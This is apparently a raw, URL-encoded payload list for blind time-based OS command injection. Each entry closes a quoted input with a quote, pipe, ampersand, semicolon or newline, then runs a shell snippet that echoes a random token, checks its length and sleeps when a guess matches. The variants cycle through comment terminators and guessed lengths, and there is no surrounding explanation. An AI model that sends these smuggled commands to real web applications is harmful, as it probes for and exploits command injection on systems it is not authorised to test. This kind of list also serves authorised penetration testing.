+%22%7C%20%5B%209%20-ne%20%24%28echo%20EUILIT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27 +%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20RIIZGU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27 +%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20RIIZGU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27 +%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20RIIZGU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27 +%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20RIIZGU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27 +%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20RIIZGU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27 +%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20RIIZGU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27 +%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20RIIZGU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27 +%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20RIIZGU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27 +%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20RIIZGU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27 +%22%0A%20str%3D%24%28echo%20ROWALZ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27 +%22%0A%20str%3D%24%28echo%20ROWALZ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27 +%22%0A%20str%3D%24%28echo%20ROWALZ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27 +%22%0A%20str%3D%24%28echo%20ROWALZ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27 +%22%0A%20str%3D%24%28echo%20ROWALZ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27 +%22%0A%20str%3D%24%28echo%20ROWALZ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27 +%22%0A%20str%3D%24%28echo%20ROWALZ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27 +%22%0A%20str%3D%24%28echo%20ROWALZ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27 +%22%0A%20str%3D%24%28echo%20ROWALZ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27 +%22%3B%20str%3D%24%28echo%20TLXEJK%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22 +%22%3B%20str%3D%24%28echo%20TLXEJK%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22 +%22%3B%20str%3D%24%28echo%20TLXEJK%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22 +%22%3B%20str%3D%24%28echo%20TLXEJK%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22 +%22%3B%20str%3D%24%28echo%20TLXEJK%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22 +%22%3B%20str%3D%24%28echo%20TLXEJK%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22 +%22%3B%20str%3D%24%28echo%20TLXEJK%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22 +%22%3B%20str%3D%24%28echo%20TLXEJK%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22 +%22%3B%20str%3D%24%28echo%20TLXEJK%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22 +%22%7C%20%5B%201%20-ne%20%24%28echo%20FATRPK%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22 +%22%7C%20%5B%202%20-ne%20%24%28echo%20FATRPK%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22 +%22%7C%20%5B%203%20-ne%20%24%28echo%20FATRPK%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22 +%22%7C%20%5B%204%20-ne%20%24%28echo%20FATRPK%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22 +%22%7C%20%5B%205%20-ne%20%24%28echo%20FATRPK%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22 +%22%7C%20%5B%206%20-ne%20%24%28echo%20FATRPK%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22 +%22%7C%20%5B%207%20-ne%20%24%28echo%20FATRPK%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22 +%22%7C%20%5B%208%20-ne%20%24%28echo%20FATRPK%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22 +%22%7C%20%5B%209%20-ne%20%24%28echo%20FATRPK%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22 +%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20AIVPGH%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22 +%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20AIVPGH%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22 +%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20AIVPGH%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22 +%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20AIVPGH%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22 +%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20AIVPGH%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22 +%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20AIVPGH%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22 +%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20AIVPGH%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22 +%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20AIVPGH%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22 +%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20AIVPGH%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22 +%22%0A%20str%3D%24%28echo%20VYCNRP%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22 +%22%0A%20str%3D%24%28echo%20VYCNRP%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22 +%22%0A%20str%3D%24%28echo%20VYCNRP%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22 +%22%0A%20str%3D%24%28echo%20VYCNRP%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22 +%22%0A%20str%3D%24%28echo%20VYCNRP%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22 +%22%0A%20str%3D%24%28echo%20VYCNRP%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22 +%22%0A%20str%3D%24%28echo%20VYCNRP%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22 +%22%0A%20str%3D%24%28echo%20VYCNRP%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22 +%22%0A%20str%3D%24%28echo%20VYCNRP%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22 +%22%3B%20str%3D%24%28echo%20WBDHXY%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23 +%22%3B%20str%3D%24%28echo%20WBDHXY%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23 +%22%3B%20str%3D%24%28echo%20WBDHXY%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23 +%22%3B%20str%3D%24%28echo%20WBDHXY%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23 +%22%3B%20str%3D%24%28echo%20WBDHXY%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23 +%22%3B%20str%3D%24%28echo%20WBDHXY%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23 +%22%3B%20str%3D%24%28echo%20WBDHXY%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23 +%22%3B%20str%3D%24%28echo%20WBDHXY%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23 +%22%3B%20str%3D%24%28echo%20WBDHXY%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23 +%22%7C%20%5B%201%20-ne%20%24%28echo%20XWWMIW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23 +%22%7C%20%5B%202%20-ne%20%24%28echo%20XWWMIW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23 +%22%7C%20%5B%203%20-ne%20%24%28echo%20XWWMIW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23 +%22%7C%20%5B%204%20-ne%20%24%28echo%20XWWMIW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23 +%22%7C%20%5B%205%20-ne%20%24%28echo%20XWWMIW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23 +%22%7C%20%5B%206%20-ne%20%24%28echo%20XWWMIW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23 +%22%7C%20%5B%207%20-ne%20%24%28echo%20XWWMIW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23 +%22%7C%20%5B%208%20-ne%20%24%28echo%20XWWMIW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23 +%22%7C%20%5B%209%20-ne%20%24%28echo%20XWWMIW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23 +%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ENIIMV%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23 +%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ENIIMV%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23 +%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ENIIMV%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23 +%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ENIIMV%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23 +%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ENIIMV%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23 +%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ENIIMV%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23 +%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ENIIMV%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23 +%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ENIIMV%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23 +%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ENIIMV%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23 +%22%0A%20str%3D%24%28echo%20HFODHQ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23 +%22%0A%20str%3D%24%28echo%20HFODHQ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23 +%22%0A%20str%3D%24%28echo%20HFODHQ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23 +%22%0A%20str%3D%24%28echo%20HFODHQ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23 +%22%0A%20str%3D%24%28echo%20HFODHQ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23 +%22%0A%20str%3D%24%28echo%20HFODHQ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23 +%22%0A%20str%3D%24%28echo%20HFODHQ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23 +%22%0A%20str%3D%24%28echo%20HFODHQ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23 +%22%0A%20str%3D%24%28echo%20HFODHQ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23 +%22%3B%20str%3D%24%28echo%20UYJMIM%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20// +%22%3B%20str%3D%24%28echo%20UYJMIM%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20// +%22%3B%20str%3D%24%28echo%20UYJMIM%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20// +%22%3B%20str%3D%24%28echo%20UYJMIM%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20// +%22%3B%20str%3D%24%28echo%20UYJMIM%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20// +%22%3B%20str%3D%24%28echo%20UYJMIM%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20// +%22%3B%20str%3D%24%28echo%20UYJMIM%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20// +%22%3B%20str%3D%24%28echo%20UYJMIM%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20// +%22%3B%20str%3D%24%28echo%20UYJMIM%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20// +%22%7C%20%5B%201%20-ne%20%24%28echo%20SYHTME%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20// +%22%7C%20%5B%202%20-ne%20%24%28echo%20SYHTME%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20// +%22%7C%20%5B%203%20-ne%20%24%28echo%20SYHTME%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20// +%22%7C%20%5B%204%20-ne%20%24%28echo%20SYHTME%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20// +%22%7C%20%5B%205%20-ne%20%24%28echo%20SYHTME%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20// +%22%7C%20%5B%206%20-ne%20%24%28echo%20SYHTME%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20// +%22%7C%20%5B%207%20-ne%20%24%28echo%20SYHTME%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20// +%22%7C%20%5B%208%20-ne%20%24%28echo%20SYHTME%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20// +%22%7C%20%5B%209%20-ne%20%24%28echo%20SYHTME%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20// +%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZDEMVI%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20// +%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZDEMVI%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20// +%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZDEMVI%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20// +%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZDEMVI%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20// +%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZDEMVI%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20// +%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZDEMVI%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20// +%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZDEMVI%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20// +%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZDEMVI%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20// +%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZDEMVI%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20// +%22%0A%20str%3D%24%28echo%20LOCFPZ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20// +%22%0A%20str%3D%24%28echo%20LOCFPZ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20// +%22%0A%20str%3D%24%28echo%20LOCFPZ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20// +%22%0A%20str%3D%24%28echo%20LOCFPZ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20// +%22%0A%20str%3D%24%28echo%20LOCFPZ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20// +%22%0A%20str%3D%24%28echo%20LOCFPZ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20// +%22%0A%20str%3D%24%28echo%20LOCFPZ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20// +%22%0A%20str%3D%24%28echo%20LOCFPZ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20// +%22%0A%20str%3D%24%28echo%20LOCFPZ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20// +%22%3B%20str%3D%24%28echo%20UDCJAJ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C 